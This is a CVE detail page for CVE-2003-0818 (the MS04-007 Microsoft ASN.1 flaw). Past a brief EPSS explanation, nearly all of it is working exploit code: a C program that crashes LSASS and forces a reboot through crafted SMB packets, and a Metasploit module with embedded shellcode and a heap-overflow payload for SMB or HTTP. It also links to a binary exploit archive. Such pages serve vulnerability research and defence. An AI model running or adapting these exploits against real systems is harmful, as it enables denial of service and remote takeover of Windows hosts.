CVE-2003-0818 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

/* * MS04-007 Exploit LSASS.EXE Win2k Pro Remote Denial-of-Service * * Copyright (C) 2004 Christophe Devine * * This program is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or * (at your option) any later version. * * This program is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the * GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this program; if not, write to the Free Software * Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA */ /* * > MS04-007-dos.exe 10.0.0.1 445 * connect failed * * > nbtstat -A 10.0.0.1 * [..] * SERVER3 <20> UNIQUE Registered * [..] * > MS04-007-dos.exe 10.0.0.1 139 SERVER3 * > MS04-007-dos.exe 10.0.0.1 139 SERVER3 * > * * if the exploit works, LSASS gets killed, * and after 1mn the server reboots. * */ //#define WIN32 #ifdef WIN32 #include <winsock2.h> #include <windows.h> #else #include <sys/types.h> #include <sys/socket.h> #include <netinet/in.h> #include <netdb.h> #endif #include <stdio.h> /****************************************************************/ unsigned char netbios_sess_req[] = /* NetBIOS Session Request */ "\x81\x00\x00\x44" "\x20\x45\x45\x45\x46\x45\x47\x45\x42\x46\x46\x45\x4D\x46\x45\x43" "\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43" "\x41\x00" "\x20\x45\x45\x45\x46\x45\x47\x45\x42\x46\x46\x45\x4D\x46\x45\x43" "\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x43\x41\x41" "\x41\x00"; /****************************************************************/ unsigned char negotiate_req[] = /* NetBIOS Message Type + Length & SMB Header */ "\x00\x00\x00\xB3" "\xFF\x53\x4D\x42\x72\x00\x00\x00\x00\x08\x01\xC8\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x75\x03\x00\x00\x02\x00" /* Negotiate Protocol Request, actually sniffed from smbclient */ "\x00\x90\x00\x02\x50\x43\x20\x4E\x45\x54\x57\x4F\x52\x4B\x20\x50" "\x52\x4F\x47\x52\x41\x4D\x20\x31\x2E\x30\x00\x02\x4D\x49\x43\x52" "\x4F\x53\x4F\x46\x54\x20\x4E\x45\x54\x57\x4F\x52\x4B\x53\x20\x31" "\x2E\x30\x33\x00\x02\x4D\x49\x43\x52\x4F\x53\x4F\x46\x54\x20\x4E" "\x45\x54\x57\x4F\x52\x4B\x53\x20\x33\x2E\x30\x00\x02\x4C\x41\x4E" "\x4D\x41\x4E\x31\x2E\x30\x00\x02\x4C\x4D\x31\x2E\x32\x58\x30\x30" "\x32\x00\x02\x44\x4F\x53\x20\x4C\x41\x4E\x4D\x41\x4E\x32\x2E\x31" "\x00\x02\x53\x61\x6D\x62\x61\x00\x02\x4E\x54\x20\x4C\x41\x4E\x4D" "\x41\x4E\x20\x31\x2E\x30\x00\x02\x4E\x54\x20\x4C\x4D\x20\x30\x2E" "\x31\x32\x00"; /****************************************************************/ unsigned char setup_request[] = /* NetBIOS Message Type + Length & SMB Header */ "\x00\x00\xCC\xCC" "\xFF\x53\x4D\x42\x73\x00\x00\x00\x00\x08\x01\xC8\x00\x00\x00\x00" "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x75\x03\x00\x00\x03\x00" /* Session Setup AndX Request */ "\x0C\xFF\x00\x00\x00\xFF\xFF\x02\x00\x01\x00\x00\x00\x00\x00\xCC" "\xCC\x00\x00\x00\x00\x5C\x00\x00\x80\xCC\xCC"; /* Security Blob: SPNEGO OID + ASN.1 stuff */ unsigned char security_blob[] = /* Application Constructed Object + SPNEGO OID */ "\x60\x82\xCC\xCC\x06\x06\x2B\x06\x01\x05\x05\x02" /* negTokenInit + Constructed Sequence */ "\xA0\x82\xCC\xCC\x30\x82\xCC\xCC" /* mechType: NTLMSSP OID */ "\xA0\x0E\x30\x0C\x06\x0A\x2B\x06\x01\x04\x01\x82\x37\x02\x02\x0A" /* reqFlags that should trigger the overflow */ "\xA1\x05\x23\x03\x03\x01\x07" /* mechToken: NTLMSSP (room for shellcode here) */ "\xA2\x82\xCC\xCC\x04\x82\xCC\xCC" "\x4E\x54\x4C\x4D\x53\x53\x50\x00\x01\x00\x00\x00\x15\x02\x08\x60" "\x09\x00\x09\x00\x20\x00\x00\x00\x07\x00\x07\x00\x29\x00\x00\x00" "\x57\x4F\x52\x4B\x47\x52\x4F\x55\x50\x44\x45\x46\x41\x55\x4C\x54"; /* Native OS & LAN Manager */ unsigned char other_stuff[] = "\x00\x55\x00\x6E\x00\x69\x00\x78\x00\x00\x00\x53\x00\x61\x00\x6D" "\x00\x62\x00\x61\x00\x00\x00"; /****************************************************************/ int main( int argc, char *argv[] ) { unsigned char buf[4096]; struct hostent *server_host; struct sockaddr_in server_addr; int i, len, server_fd, n1, n2, n3; #ifdef WIN32 WSADATA wsa; /* initialize windows sockets */ if( WSAStartup( MAKEWORD(2,0), &wsa ) ) { fprintf( stderr, "WSAStartup failed\n" ); return( 1 ); } #endif if( argc != 3 && argc != 4 ) { fprintf( stderr, "usage: %s <target hostname> " "<port> [netbios name]\n", argv[0] ); return( 1 ); } /* resolve the server hostname and connect */ server_host = gethostbyname( argv[1] ); if( server_host == NULL ) { fprintf( stderr, "gethostbyname(%s) failed\n", argv[1] ); return( 1 ); } memcpy( (void *) &server_addr.sin_addr, (void *) server_host->h_addr, server_host->h_length ); sscanf( argv[2], "%d", &i ); server_addr.sin_family = AF_INET; server_addr.sin_port = htons( (unsigned short) i ); server_fd = socket( AF_INET, SOCK_STREAM, IPPROTO_IP ); if( server_fd < 0 ) { fprintf( stderr, "could not create socket\n" ); return( 1 ); } len = sizeof( server_addr ); if( connect( server_fd, (struct sockaddr *) &server_addr, len ) < 0 ) { fprintf( stderr, "connect failed\n" ); return( 1 ); } if( argc == 4 ) { /* encode the Called NetBIOS Name */ len = sizeof( netbios_sess_req ) - 1; memcpy( buf, netbios_sess_req, len ); memset( buf + 5, 'A', 32 ); for( i = 0; i < (int) strlen( argv[3] ); i++ ) { buf[5 + i * 2] += argv[3][i] >> 4; buf[6 + i * 2] += argv[3][i] & 15; } for( ; i < 16; i++ ) { buf[5 + i * 2] += 0x20 >> 4; buf[6 + i * 2] += 0x20 & 15; } /* 1. NetBIOS Session Request */ if( send( server_fd, buf, len, 0 ) != len ) { fprintf( stderr, "send(NetBIOS Session Request) failed\n" ); return( 1 ); } if( recv( server_fd, buf, sizeof( buf ), 0 ) <= 0 ) { fprintf( stderr, "recv(NetBIOS Session Response) failed\n" ); return( 1 ); } if( buf[0] == 0x83 ) { fprintf( stderr, "NetBIOS Session rejected " "(wrong NetBIOS name ?)\n" ); return( 1 ); } } /* 2. Negotiate Protocol Request */ len = sizeof( negotiate_req ) - 1; if( send( server_fd, negotiate_req, len, 0 ) != len ) { fprintf( stderr, "send(Negotiate Protocol Request) failed\n" ); return( 1 ); } if( recv( server_fd, buf, sizeof( buf ), 0 ) <= 0 ) { fprintf( stderr, "recv(Negotiate Protocol Response) failed\n" ); return( 1 ); } /* 3. Session Setup AndX Request */ memset( buf, 'A', sizeof( buf ) ); n1 = sizeof( setup_request ) - 1; n2 = sizeof( security_blob ) - 1; n3 = sizeof( other_stuff ) - 1; memcpy( buf, setup_request, n1 ); memcpy( buf + n1, security_blob, n2 ); n2 += 2000; /* heap padding for shellcode */ memcpy( buf + n1 + n2, other_stuff, n3 ); len = n1 + n2 + n3; buf[ 2] = ( ( len - 4 ) >> 8 ) & 0xFF; /* NetBIOS msg length */ buf[ 3] = ( ( len - 4 ) ) & 0xFF; buf[51] = ( n2 ) & 0xFF; /* Security Blob Length */ buf[52] = ( n2 >> 8 ) & 0xFF; buf[61] = ( ( n2 + n3 ) ) & 0xFF; /* Byte Count (BCC) */ buf[62] = ( ( n2 + n3 ) >> 8 ) & 0xFF; buf[n1 + 2] = ( ( n2 - 4 ) >> 8 ) & 0xFF; /* ACO Length */ buf[n1 + 3] = ( ( n2 - 4 ) ) & 0xFF; buf[n1 + 14] = ( ( n2 - 16 ) >> 8 ) & 0xFF; /* negTokenInit Length */ buf[n1 + 15] = ( ( n2 - 16 ) ) & 0xFF; buf[n1 + 18] = ( ( n2 - 20 ) >> 8 ) & 0xFF; /* Constr. Seq. Length */ buf[n1 + 19] = ( ( n2 - 20 ) ) & 0xFF; buf[n1 + 45] = ( ( n2 - 47 ) >> 8 ) & 0xFF; /* mechToken Length */ buf[n1 + 46] = ( ( n2 - 47 ) ) & 0xFF; buf[n1 + 49] = ( ( n2 - 51 ) >> 8 ) & 0xFF; /* String Length */ buf[n1 + 50] = ( ( n2 - 51 ) ) & 0xFF; if( send( server_fd, buf, len, 0 ) != len ) { fprintf( stderr, "send(Session Setup AndX Request) failed\n" ); return( 1 ); } recv( server_fd, buf, sizeof( buf ), 0 ); shutdown( server_fd, 2 ); return( 0 ); } // milw0rm.com [2004-02-14]

## # $Id: ms04_007_killbill.rb 9929 2010-07-25 21:37:54Z jduck $ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # Framework web site for more information on licensing and terms of use. # http://metasploit.com/framework/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = LowRanking include Msf::Exploit::Remote::SMB def initialize(info = {}) super(update_info(info, 'Name' => 'Microsoft ASN.1 Library Bitstring Heap Overflow', 'Description' => %q{ This is an exploit for a previously undisclosed vulnerability in the bit string decoding code in the Microsoft ASN.1 library. This vulnerability is not related to the bit string vulnerability described in eEye advisory AD20040210-2. Both vulnerabilities were fixed in the MS04-007 patch. You are only allowed one attempt with this vulnerability. If the payload fails to execute, the LSASS system service will crash and the target system will automatically reboot itself in 60 seconds. If the payload succeeeds, the system will no longer be able to process authentication requests, denying all attempts to login through SMB or at the console. A reboot is required to restore proper functioning of an exploited system. This exploit has been successfully tested with the win32/*/reverse_tcp payloads, however a few problems were encounted when using the equivalent bind payloads. Your mileage may vary. }, 'Author' => [ 'Solar Eclipse <[email protected]>' ], 'License' => GPL_LICENSE, 'Version' => '$Revision: 9929 $', 'References' => [ [ 'CVE', '2003-0818'], [ 'OSVDB', '3902' ], [ 'BID', '9633'], [ 'URL', 'http://www.phreedom.org/solar/exploits/msasn1-bitstring/'], [ 'MSB', 'MS04-007'], ], 'DefaultOptions' => { 'EXITFUNC' => 'thread' }, 'Privileged' => true, 'Payload' => { 'Space' => 1024, 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Windows 2000 SP2-SP4 + Windows XP SP0-SP1', # Tested OK - 11/25/2005 hdm (bind failed) { 'Platform' => 'win', }, ], ], 'DisclosureDate' => 'Feb 10 2004', 'DefaultTarget' => 0)) register_options( [ OptString.new('PROTO', [ true, "Which protocol to use: http or smb", 'smb']), ], self.class) end # This exploit is too destructive to use during automated exploitation. # Better Windows-based exploits exist at this time (Sep 2006) def autofilter false end # This is a straight port of Solar Eclipse's "kill-bill" exploit, published # as a Metasploit Framework module with his permission. This module is only # licensed under GPLv2, keep this in mind if you embed the Framework into # a non-GPL application. -hdm[at]metasploit.com def exploit # The first stage shellcode fixes the PEB pointer and cleans the heap stage0 = "\x53\x56\x57\x66\x81\xec\x80\x00\x89\xe6\xe8\xed\x00\x00\x00\xff"+ "\x36\x68\x09\x12\xd6\x63\xe8\xf7\x00\x00\x00\x89\x46\x08\xe8\xa2"+ "\x00\x00\x00\xff\x76\x04\x68\x6b\xd0\x2b\xca\xe8\xe2\x00\x00\x00"+ "\x89\x46\x0c\xe8\x3f\x00\x00\x00\xff\x76\x04\x68\xfa\x97\x02\x4c"+ "\xe8\xcd\x00\x00\x00\x31\xdb\x68\x10\x04\x00\x00\x53\xff\xd0\x89"+ "\xc3\x56\x8b\x76\x10\x89\xc7\xb9\x10\x04\x00\x00\xf3\xa4\x5e\x31"+ "\xc0\x50\x50\x50\x53\x50\x50\xff\x56\x0c\x8b\x46\x08\x66\x81\xc4"+ "\x80\x00\x5f\x5e\x5b\xff\xe0\x60\xe8\x23\x00\x00\x00\x8b\x44\x24"+ "\x0c\x8d\x58\x7c\x83\x43\x3c\x05\x81\x43\x28\x00\x10\x00\x00\x81"+ "\x63\x28\x00\xf0\xff\xff\x8b\x04\x24\x83\xc4\x14\x50\x31\xc0\xc3"+ "\x31\xd2\x64\xff\x32\x64\x89\x22\x31\xdb\xb8\x90\x42\x90\x42\x31"+ "\xc9\xb1\x02\x89\xdf\xf3\xaf\x74\x03\x43\xeb\xf3\x89\x7e\x10\x64"+ "\x8f\x02\x58\x61\xc3\x60\xbf\x20\xf0\xfd\x7f\x8b\x1f\x8b\x46\x08"+ "\x89\x07\x8b\x7f\xf8\x81\xc7\x78\x01\x00\x00\x89\xf9\x39\x19\x74"+ "\x04\x8b\x09\xeb\xf8\x89\xfa\x39\x5a\x04\x74\x05\x8b\x52\x04\xeb"+ "\xf6\x89\x11\x89\x4a\x04\xc6\x43\xfd\x01\x61\xc3\xa1\x0c\xf0\xfd"+ "\x7f\x8b\x40\x1c\x8b\x58\x08\x89\x1e\x8b\x00\x8b\x40\x08\x89\x46"+ "\x04\xc3\x60\x8b\x6c\x24\x28\x8b\x45\x3c\x8b\x54\x05\x78\x01\xea"+ "\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3\x38\x49\x8b\x34\x8b\x01\xee"+ "\x31\xff\x31\xc0\xfc\xac\x38\xe0\x74\x07\xc1\xcf\x0d\x01\xc7\xeb"+ "\xf4\x3b\x7c\x24\x24\x75\xe1\x8b\x5a\x24\x01\xeb\x66\x8b\x0c\x4b"+ "\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01\xe8\x89\x44\x24\x1c\x61\xc2"+ "\x08\x00\xeb\xfe" token = spnego_token(stage0, payload.encoded) case datastore['PROTO'] when 'smb' exploit_smb(token) when 'http' exploit_http(token) else print_status("Invalid application protocol specified, use smb or http") end end def exploit_smb(token) connect client = Rex::Proto::SMB::Client.new(sock) begin client.session_request(smb_hostname()) if not datastore['SMBDirect'] client.negotiate client.session_setup_ntlmv2_blob(token) rescue => e if (e.to_s =~ /error code 0x00050001/) print_error("The target system has already been exploited") else print_error("Error: #{e}") end end handler disconnect end def exploit_http(token) connect req = "GET / HTTP/1.0\r\n" req << "Host: #{ datastore['RHOST']}\r\n" req << "Authorization: Negotiate #{Rex::Text.encode_base64(token, '')}\r\n\r\n" sock.put(req) res = sock.get_once if (res and res =~ /0x80090301/) print_error("This server does not support the Negotiate protocol or has already been exploited") end if (res and res =~ /0x80090304/) print_error("This server responded with error code 0x80090304 (wth?)") end handler disconnect end # Returns an ASN.1 encoded string def enc_asn1(str) Rex::Proto::SMB::Utils::asn1encode(str) end # Returns an ASN.1 encoded bit string with 0 unused bits def enc_bits(str) "\x03" + enc_asn1("\x00" + str) end # Returns a BER encoded constructed bit string def enc_constr(*str_arr) "\x23" + enc_asn1(str_arr.join('')) end # Returns a BER encoded SPNEGO token def spnego_token(stage0, stage1) if !(stage0 and stage1) print_status("Invalid parameters passed to spnego_token") return end if (stage0.length > 1032) print_status("The stage 0 shellcode is longer than 1032 bytes") return end tag = "\x90\x42\x90\x42\x90\x42\x90\x42" if ((tag.length + stage1.length) > 1033) print_status("The stage 1 shellcode is too long") return end # The first two overwrites must succeed, so we write to an unused location # in the PEB block. We don't care about the values, because after this the # doubly linked list of free blocks is corrupted and we get to the second # overwrite which is more useful. fw = "\xf8\x0f\x01\x00" # 0x00010ff8 bk = "\xf8\x0f\x01" # The second overwrite writes the address of our shellcode into the # FastPebLockRoutine pointer in the PEB peblock = "\x20\xf0\xfd\x7f" # FastPebLockRoutine in PEB bitstring = enc_constr( enc_bits("A" * 1024), "\x03\x00", enc_constr( enc_bits(tag + stage1 + ("B" * (1033-(tag+stage1).length))), enc_constr( enc_bits(fw + bk) ), enc_constr( enc_bits("CCCC" + peblock + stage0 + ("C" * (1032-stage0.length))), enc_constr( enc_bits("\xeb\x06" + make_nops(6)), enc_bits("D" * 1040) ) ) ) ) token = "\x60" + enc_asn1( # Application Constructed Object "\x06\x06\x2b\x06\x01\x05\x05\x02" + # SPNEGO OID "\xa0" + enc_asn1( # NegTokenInit (0xa0) "\x30" + enc_asn1( "\xa1" + enc_asn1( bitstring ) ) ) ) return token end end

# Microsoft ASN.1 remote exploit for CVE-2005-1935 // MS04-007 # Solar Eclipse # solareclipse at phreedom dot org https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/3022.tar.gz (12262006-killbill.tar.gz) # milw0rm.com [2004-03-26]